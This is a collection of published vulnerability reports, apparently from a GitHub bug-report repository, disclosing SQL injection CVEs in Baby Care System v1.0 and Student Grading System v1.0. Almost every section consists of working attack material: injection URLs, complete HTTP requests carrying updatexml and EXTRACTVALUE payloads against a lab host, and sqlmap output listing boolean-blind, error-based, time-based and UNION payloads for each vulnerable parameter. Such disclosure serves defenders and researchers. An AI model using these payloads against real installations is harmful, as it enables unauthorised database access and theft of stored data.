Baby Care System v1.0 was discovered to contain a SQL injection vulnerability via /admin/posts.php&find=.

**Body Care System has SQL injection vulnerability**

vendor: https://www.sourcecodester.com/php/14622/baby-care-system-phpmysqli-full-source-code.html

Vulnerability file: /BabyCare/admin/posts.php&find=

Vulnerability location: /BabyCare/admin.php?id=posts&find= //find is Injection point

\[+\]Payload: /BabyCare/admin.php?id=posts&find=3%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),2)--+ //find is Injection point

GET /BabyCare/admin.php?id\=posts&find\=3%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),2)\--\+ HTTP/1.1
Host: 192.168.1.19
Cache\-Control: max\-age\=0
Upgrade\-Insecure\-Requests: 1
User\-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=v8g2iaa0tsnt5b01btt83eb7qo
Connection: close

\--\-
Parameter: find (GET)
    Type: boolean\-based blind
    Title: MySQL RLIKE boolean\-based blind \- WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: id\=posts&find\=3' RLIKE (SELECT (CASE WHEN (6593=6593) THEN 3 ELSE 0x28 END))-- zXvu
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=posts&find=3' AND (SELECT 3959 FROM(SELECT COUNT(\*),CONCAT(0x7170787071,(SELECT (ELT(3959\=3959,1))),0x7178787171,FLOOR(RAND(0)\*2))x FROM INFORMATION\_SCHEMA.PLUGINS GROUP BY x)a)\-- IVWt

    Type: time\-based blind
    Title: MySQL \>= 5.0.12 AND time\-based blind (query SLEEP)
    Payload: id\=posts&find\=3' AND (SELECT 4643 FROM (SELECT(SLEEP(5)))bafh)-- GSoV
    Type: UNION query
    Title: MySQL UNION query (NULL) - 8 columns
    Payload: id=posts&find=3' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7170787071,0x65476d614a4d4d69526c636a4e486f436b45485a67484d67736e4e47657a654761684c644d734557,0x7178787171),NULL#
\--\-

CVE-2022-28424: bug_report/SQLi-5.md at main · k0xx11/bug_report

Baby Care System v1.0 was discovered to contain a SQL injection vulnerability via /admin/inbox.php&action=read&msgid=.

**Body Care System has SQL injection vulnerability**

vendor: https://www.sourcecodester.com/php/14622/baby-care-system-phpmysqli-full-source-code.html

Vulnerability file: /BabyCare/admin/inbox.php&action=read&msgid=

![image](https://user-images.githubusercontent.com/54017627/161354868-cc09a2cd-ef2a-4185-a6a9-9c70eb9c0c29.png)

Vulnerability location: /BabyCare/admin.php?id=inbox&action=read&msgid=11 //msgid is Injection point

\[+\]Payload: /BabyCare/admin.php?id=inbox&action=read&msgid=11%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),2)--+ //msgid is Injection point

GET /BabyCare/admin.php?id\=inbox&action\=read&msgid\=11%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),2)\--\+ HTTP/1.1
Host: 192.168.1.19
Cache\-Control: max\-age\=0
Upgrade\-Insecure\-Requests: 1
User\-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=h48mjnelp4g0935821l2k3g5ne
Connection: close

![image](https://user-images.githubusercontent.com/54017627/161354750-1f5d471f-7c65-4025-b497-b1c04399c8c8.png)

\--\-
Parameter: msgid (GET)
    Type: boolean\-based blind
    Title: AND boolean\-based blind \- WHERE or HAVING clause
    Payload: id\=inbox&action\=read&msgid\=11' AND 4681=4681 AND 'xjEi'\='xjEi

    Type: error\-based
    Title: MySQL \>= 5.0 AND error\-based \- WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id\=inbox&action\=read&msgid\=11' AND (SELECT 9382 FROM(SELECT COUNT(\*),CONCAT(0x716b707871,(SELECT (ELT(9382=9382,1))),0x7178787071,FLOOR(RAND(0)\*2))x FROM INFORMATION\_SCHEMA.PLUGINS GROUP BY x)a) AND 'TmlF'\='TmlF

    Type: time\-based blind
    Title: MySQL \>= 5.0.12 AND time\-based blind (query SLEEP)
    Payload: id\=inbox&action\=read&msgid\=11' AND (SELECT 7228 FROM (SELECT(SLEEP(5)))cyYg) AND 'PNfI'\='PNfI
\--\-

![image](https://user-images.githubusercontent.com/54017627/161354890-0bdea68d-69f7-4945-a32e-de5c49329d50.png)

CVE-2022-28427: bug_report/SQLi-9.md at main · k0xx11/bug_report

Baby Care System v1.0 was discovered to contain a SQL injection vulnerability via /admin/inbox.php&action=delete&msgid=.

**Body Care System has SQL injection vulnerability**

vendor: https://www.sourcecodester.com/php/14622/baby-care-system-phpmysqli-full-source-code.html

Vulnerability file: /BabyCare/admin/inbox.php&action=delete&msgid=

![image](https://user-images.githubusercontent.com/54017627/161355051-d632b485-255d-4c09-b000-44f36b582768.png)

Vulnerability location: /BabyCare/admin.php?id=inbox&action=delete&msgid=11 //msgid is Injection point

\[+\]Payload: /BabyCare/admin.php?id=inbox&action=delete&msgid=11%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),2)--+ //msgid is Injection point

GET /BabyCare/admin.php?id\=inbox&action\=delete&msgid\=11%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),2)\--\+ HTTP/1.1
Host: 192.168.1.19
Cache\-Control: max\-age\=0
Upgrade\-Insecure\-Requests: 1
User\-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=h48mjnelp4g0935821l2k3g5ne
Connection: close

![image](https://user-images.githubusercontent.com/54017627/161354945-37f592d9-b9dc-4581-85a1-6e95ed44f521.png)

\--\-
Parameter: msgid (GET)
    Type: boolean\-based blind
    Title: MySQL RLIKE boolean\-based blind \- WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: id\=inbox&action\=delete&msgid\=11' RLIKE (SELECT (CASE WHEN (7743=7743) THEN 11 ELSE 0x28 END))-- sevP
    Type: error-based
    Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
    Payload: id=inbox&action=delete&msgid=11' AND EXTRACTVALUE(4012,CONCAT(0x5c,0x7178787171,(SELECT (ELT(4012\=4012,1))),0x7176787171))\-- onZM

    Type: time\-based blind
    Title: MySQL \>= 5.0.12 AND time\-based blind (query SLEEP)
    Payload: id\=inbox&action\=delete&msgid\=11' AND (SELECT 7504 FROM (SELECT(SLEEP(5)))TPJa)-- gsFn
\---

![image](https://user-images.githubusercontent.com/54017627/161355028-8b85f504-b1fe-4fad-8382-790d3e86ef98.png)

CVE-2022-28429: bug_report/SQLi-10.md at main · k0xx11/bug_report

Baby Care System v1.0 was discovered to contain a SQL injection vulnerability via /admin/siteoptions.php&action=displaygoal&value=1&roleid=1.

**Body Care System has SQL injection vulnerability**

vendor: https://www.sourcecodester.com/php/14622/baby-care-system-phpmysqli-full-source-code.html

Vulnerability file: /BabyCare/admin/siteoptions.php &action=displaygoal&value=1&roleid=1

![image](https://user-images.githubusercontent.com/54017627/161356210-d3b64f61-2ff2-4b67-b756-b3811bfb987e.png)

Vulnerability location: /BabyCare/admin.php?id=siteoptions&action=displaygoal&value=1&roleid=1 //roleid is Injection point

\[+\]Payload: /BabyCare/admin.php?id=siteoptions&action=displaygoal&value=1&roleid=1%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),2)--+ //roleid is Injection point

GET /BabyCare/admin.php?id\=siteoptions&action\=displaygoal&value\=1&roleid\=1%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),2)\--\+ HTTP/1.1
Host: 192.168.1.19
Cache\-Control: max\-age\=0
Upgrade\-Insecure\-Requests: 1
User\-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=h48mjnelp4g0935821l2k3g5ne
Connection: close

![image](https://user-images.githubusercontent.com/54017627/161356077-5f38e3a3-3487-46f6-b2f5-28b57d560a29.png)

\--\-
Parameter: roleid (GET)
    Type: boolean\-based blind
    Title: MySQL RLIKE boolean\-based blind \- WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: id\=siteoptions&action\=displaygoal&value\=1&roleid\=1' RLIKE (SELECT (CASE WHEN (1355=1355) THEN 1 ELSE 0x28 END))-- hyrZ
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=siteoptions&action=displaygoal&value=1&roleid=1' AND (SELECT 9758 FROM(SELECT COUNT(\*),CONCAT(0x7162787071,(SELECT (ELT(9758\=9758,1))),0x71786a7171,FLOOR(RAND(0)\*2))x FROM INFORMATION\_SCHEMA.PLUGINS GROUP BY x)a)\-- gGPp

    Type: time\-based blind
    Title: MySQL \>= 5.0.12 AND time\-based blind (query SLEEP)
    Payload: id\=siteoptions&action\=displaygoal&value\=1&roleid\=1' AND (SELECT 2161 FROM (SELECT(SLEEP(5)))CrAu)-- SdUW
\---

![image](https://user-images.githubusercontent.com/54017627/161356181-278bf5aa-cd02-448d-99fe-03491a9623b2.png)

CVE-2022-28435: bug_report/SQLi-15.md at main · k0xx11/bug_report

Baby Care System v1.0 was discovered to contain a SQL injection vulnerability via /admin/uesrs.php&&action=delete&userid=4.

**Body Care System has SQL injection vulnerability**

vendor: https://www.sourcecodester.com/php/14622/baby-care-system-phpmysqli-full-source-code.html

Vulnerability file: /BabyCare/admin/uesrs.php&&action=delete&userid=4

![image](https://user-images.githubusercontent.com/54017627/161356819-85b2956c-6f77-40f2-8f48-4a4e32ab0963.png)

Vulnerability location: /BabyCare/admin.php?id=users&action=delete&userid=4 //uesrid is Injection point

\[+\]Payload: /BabyCare/admin.php?id=users&action=delete&userid=4%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),2)--+ //userid is Injection point

GET /BabyCare/admin.php?id\=users&action\=delete&userid\=4%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),2)\--\+ HTTP/1.1
Host: 192.168.1.19
Cache\-Control: max\-age\=0
Upgrade\-Insecure\-Requests: 1
User\-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=h48mjnelp4g0935821l2k3g5ne
Connection: close

![image](https://user-images.githubusercontent.com/54017627/161356722-7853064b-163d-40d1-b66c-6547ce119001.png)

\--\-
Parameter: userid (GET)
    Type: boolean\-based blind
    Title: MySQL RLIKE boolean\-based blind \- WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: id\=users&action\=delete&userid\=4' RLIKE (SELECT (CASE WHEN (9720=9720) THEN 4 ELSE 0x28 END))-- nviO
    Type: error-based
    Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
    Payload: id=users&action=delete&userid=4' AND EXTRACTVALUE(9289,CONCAT(0x5c,0x716b6b6271,(SELECT (ELT(9289\=9289,1))),0x717a707a71))\-- ULrQ

    Type: time\-based blind
    Title: MySQL \>= 5.0.12 AND time\-based blind (query SLEEP)
    Payload: id\=users&action\=delete&userid\=4' AND (SELECT 6930 FROM (SELECT(SLEEP(5)))eKMb)-- Pdwh
\---

![image](https://user-images.githubusercontent.com/54017627/161356843-59a6dd0a-d394-4f8f-bedf-0fe88ca618c6.png)

CVE-2022-28439: bug_report/SQLi-19.md at main · k0xx11/bug_report

Baby Care System v1.0 was discovered to contain a SQL injection vulnerability via /admin/uesrs.php&action=display&value=Hide&userid=.

**Body Care System has SQL injection vulnerability**

vendor: https://www.sourcecodester.com/php/14622/baby-care-system-phpmysqli-full-source-code.html

Vulnerability file: /BabyCare/admin/uesrs.php&action=display&value=Hide&userid=

![image](https://user-images.githubusercontent.com/54017627/161356353-ed05fce2-7ad0-4f82-ba55-eddd9a8948ea.png)

Vulnerability location: /BabyCare/admin.php?id=users&action=display&value=Hide&userid=3 //uesrid is Injection point

\[+\]Payload: /BabyCare/admin.php?id=users&action=display&value=Hide&userid=3%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),2)--+ //userid is Injection point

GET /BabyCare/admin.php?id\=users&action\=display&value\=Hide&userid\=3%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),2)\--\+ HTTP/1.1
Host: 192.168.1.19
Cache\-Control: max\-age\=0
Upgrade\-Insecure\-Requests: 1
User\-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=h48mjnelp4g0935821l2k3g5ne
Connection: close

![image](https://user-images.githubusercontent.com/54017627/161356446-b8a42d72-b863-46be-abde-72293066173f.png)

\--\-
Parameter: userid (GET)
    Type: boolean\-based blind
    Title: MySQL RLIKE boolean\-based blind \- WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: id\=users&action\=display&value\=Hide&userid\=3' RLIKE (SELECT (CASE WHEN (4266=4266) THEN 3 ELSE 0x28 END))-- anKB
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=users&action=display&value=Hide&userid=3' AND (SELECT 6721 FROM(SELECT COUNT(\*),CONCAT(0x71787a7671,(SELECT (ELT(6721\=6721,1))),0x7176707671,FLOOR(RAND(0)\*2))x FROM INFORMATION\_SCHEMA.PLUGINS GROUP BY x)a)\-- VDvY

    Type: time\-based blind
    Title: MySQL \>= 5.0.12 AND time\-based blind (query SLEEP)
    Payload: id\=users&action\=display&value\=Hide&userid\=3' AND (SELECT 4203 FROM (SELECT(SLEEP(5)))ArnD)-- lMLp
\---

![image](https://user-images.githubusercontent.com/54017627/161356459-c7e30dce-0409-4f33-bbb2-f01d3880d198.png)

CVE-2022-28436: bug_report/SQLi-17.md at main · k0xx11/bug_report

Baby Care System v1.0 was discovered to contain a SQL injection vulnerability via /admin/uesrs.php&action=display&value=Show&userid=.

**Body Care System has SQL injection vulnerability**

vendor: https://www.sourcecodester.com/php/14622/baby-care-system-phpmysqli-full-source-code.html

Vulnerability file: /BabyCare/admin/uesrs.php&action=display&value=Show&userid=

![image](https://user-images.githubusercontent.com/54017627/161356353-ed05fce2-7ad0-4f82-ba55-eddd9a8948ea.png)

Vulnerability location: /BabyCare/admin.php?id=users&action=display&value=Show&userid=3 //uesrid is Injection point

\[+\]Payload: /BabyCare/admin.php?id=users&action=display&value=Show&userid=3%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),2)--+ //userid is Injection point

GET /BabyCare/admin.php?id\=users&action\=display&value\=Show&userid\=3%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),2)\--\+ HTTP/1.1
Host: 192.168.1.19
Cache\-Control: max\-age\=0
Upgrade\-Insecure\-Requests: 1
User\-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=h48mjnelp4g0935821l2k3g5ne
Connection: close

![image](https://user-images.githubusercontent.com/54017627/161356273-40a840aa-a8d6-4dfd-a8e9-b766d9ee15ed.png)

\--\-
Parameter: userid (GET)
    Type: boolean\-based blind
    Title: MySQL RLIKE boolean\-based blind \- WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: id\=users&action\=display&value\=Show&userid\=3' RLIKE (SELECT (CASE WHEN (8387=8387) THEN 3 ELSE 0x28 END))-- qMWa
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=users&action=display&value=Show&userid=3' AND (SELECT 1354 FROM(SELECT COUNT(\*),CONCAT(0x71627a7871,(SELECT (ELT(1354\=1354,1))),0x7171707671,FLOOR(RAND(0)\*2))x FROM INFORMATION\_SCHEMA.PLUGINS GROUP BY x)a)\-- hxjb

    Type: time\-based blind
    Title: MySQL \>= 5.0.12 AND time\-based blind (query SLEEP)
    Payload: id\=users&action\=display&value\=Show&userid\=3' AND (SELECT 8907 FROM (SELECT(SLEEP(5)))qpmN)-- ZPdb
\---

![image](https://user-images.githubusercontent.com/54017627/161356374-752599b1-a482-4ad3-b355-672f3db669af.png)

CVE-2022-28433: bug_report/SQLi-16.md at main · k0xx11/bug_report

Baby Care System v1.0 was discovered to contain a SQL injection vulnerability via /admin/uesrs.php&action=type&userrole=Admin&userid=3.

**Body Care System has SQL injection vulnerability**

vendor: https://www.sourcecodester.com/php/14622/baby-care-system-phpmysqli-full-source-code.html

Vulnerability file: /BabyCare/admin/uesrs.php&action=type&userrole=Admin&userid=3

![image](https://user-images.githubusercontent.com/54017627/161356632-c3f8fb12-4696-437f-8827-ee3edf86aac8.png)

Vulnerability location: /BabyCare/admin.php?id=users&action=type&userrole=Admin&userid=3 //uesrid is Injection point

\[+\]Payload: /BabyCare/admin.php?id=users&action=type&userrole=Admin&userid=3%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),2)--+ //userid is Injection point

GET /BabyCare/admin.php?id\=users&action\=type&userrole\=Admin&userid\=3%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),2)\--\+ HTTP/1.1
Host: 192.168.1.19
Cache\-Control: max\-age\=0
Upgrade\-Insecure\-Requests: 1
User\-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=h48mjnelp4g0935821l2k3g5ne
Connection: close

![image](https://user-images.githubusercontent.com/54017627/161356539-57cb5e80-5591-43f1-b23b-4cd120494c85.png)

\--\-
Parameter: userid (GET)
    Type: boolean\-based blind
    Title: MySQL RLIKE boolean\-based blind \- WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: id\=users&action\=type&userrole\=Admin&userid\=3' RLIKE (SELECT (CASE WHEN (7538=7538) THEN 3 ELSE 0x28 END))-- NbTT
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=users&action=type&userrole=Admin&userid=3' AND (SELECT 2325 FROM(SELECT COUNT(\*),CONCAT(0x71717a7a71,(SELECT (ELT(2325\=2325,1))),0x7170787171,FLOOR(RAND(0)\*2))x FROM INFORMATION\_SCHEMA.PLUGINS GROUP BY x)a)\-- WVHM

    Type: time\-based blind
    Title: MySQL \>= 5.0.12 AND time\-based blind (query SLEEP)
    Payload: id\=users&action\=type&userrole\=Admin&userid\=3' AND (SELECT 2980 FROM (SELECT(SLEEP(5)))vKGr)-- qZsw
\---

![image](https://user-images.githubusercontent.com/54017627/161356602-ed01f524-7a1f-465d-abe7-8d3f6ce7cd38.png)

CVE-2022-28437: bug_report/SQLi-18.md at main · k0xx11/bug_report

Student Grading System v1.0 was discovered to contain a SQL injection vulnerability via /student-grading-system/rms.php?page=school_year.

Permalink

Cannot retrieve contributors at this time

**Student-grading-system v1.0 by oretnom23 has SQL injection**

vendors: https://www.sourcecodester.com/php/14522/student-grading-system-using-phpmysql-source-code.html

Vulnerability File: /student-grading-system/rms.php?page=school\_year

Vulnerability location: /student-grading-system/rms.php?page=school\_year,sy

\[+\] Pyaload: id=4&sy=1' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+&status=%E4%B8%8D

POST /student\-grading\-system/rms.php?page\=school\_year HTTP/1.1
Host: 192.168.1.19
Content\-Length: 71
Cache\-Control: max\-age\=0
Upgrade\-Insecure\-Requests: 1
Origin: http://192.168.1.19
Content\-Type: application/x\-www\-form\-urlencoded
User\-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.82 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.1.19/student-grading-system/rms.php?page=school\_year
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=lpvr00hu9v7v4dvs4atvc5gdg6
Connection: close
id=4&sy=1' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+&status=%E4%B8%8D

CVE-2022-28025: bug_report/SQLi-2.md at main · k0xx11/bug_report

Baby Care System v1.0 was discovered to contain a SQL injection vulnerability via /admin.php?id=siteoptions&social=display&value=0&sid=2.

**Body Care System has SQL injection vulnerability**

vendor: https://www.sourcecodester.com/php/14622/baby-care-system-phpmysqli-full-source-code.html

Vulnerability file: /BabyCare/admin/siteoptions.php&social=display&value=0&sid=2

![image](https://user-images.githubusercontent.com/54017627/161355656-51fc1533-645f-475f-9543-f1b8cfda034c.png)

Vulnerability location: /BabyCare/admin.php?id=siteoptions&social=display&value=0&sid=2 //sid is Injection point

\[+\]Payload: /BabyCare/admin.php?id=siteoptions&social=display&value=0&sid=2%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),2)--+ //sid is Injection point

GET /BabyCare/admin.php?id\=siteoptions&social\=display&value\=0&sid\=2%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),2)\--\+ HTTP/1.1
Host: 192.168.1.19
Cache\-Control: max\-age\=0
Upgrade\-Insecure\-Requests: 1
User\-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=h48mjnelp4g0935821l2k3g5ne
Connection: close

![image](https://user-images.githubusercontent.com/54017627/161355572-19eb6a66-cf68-4973-913c-f7b3fed27099.png)

\--\-
Parameter: sid (GET)
    Type: boolean\-based blind
    Title: MySQL RLIKE boolean\-based blind \- WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: id\=siteoptions&social\=display&value\=0&sid\=2' RLIKE (SELECT (CASE WHEN (1596=1596) THEN 2 ELSE 0x28 END))-- vRBd
    Type: error-based
    Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
    Payload: id=siteoptions&social=display&value=0&sid=2' AND EXTRACTVALUE(9578,CONCAT(0x5c,0x716a7a6a71,(SELECT (ELT(9578\=9578,1))),0x717a717871))\-- BkeH

    Type: time\-based blind
    Title: MySQL \>= 5.0.12 AND time\-based blind (query SLEEP)
    Payload: id\=siteoptions&social\=display&value\=0&sid\=2' AND (SELECT 4775 FROM (SELECT(SLEEP(5)))Cixw)-- gPVs
\---

![image](https://user-images.githubusercontent.com/54017627/161355637-70b6ae74-0250-4b8f-94f9-6bbfb07f6f1f.png)

Tag

#windows